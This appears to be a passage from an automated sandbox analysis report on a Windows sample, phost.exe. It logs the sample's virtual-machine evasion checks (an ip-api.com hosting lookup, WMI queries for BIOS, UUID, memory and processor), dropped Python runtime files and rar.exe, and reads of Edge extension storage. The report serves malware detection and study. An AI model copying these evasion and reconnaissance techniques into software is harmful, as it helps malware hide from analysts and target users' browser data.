              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8399Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1114Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8523
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 992
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6452
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3189
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1851
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 770
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6121
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2515
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3955
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5800
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1258
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3771
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 574
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2854
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1368
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32202\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17382
              Source: C:\Users\user\Desktop\phost.exeAPI coverage: 6.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 8399 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 1114 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 8523 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 992 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7704Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 6452 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 3189 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 1851 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 770 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 6121 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 2515 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep count: 3955 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 285 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 5800 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 1258 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 3771 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 574 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 2854 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 1368 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC792F0 FindFirstFileExW,FindClose,0_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC783B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62CC783B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC792F0 FindFirstFileExW,FindClose,1_2_00007FF62CC792F0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC918E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62CC918E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,105_2_00007FF6BBCD46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,105_2_00007FF6BBCCE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD188E0 FindFirstFileExA,105_2_00007FF6BBD188E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
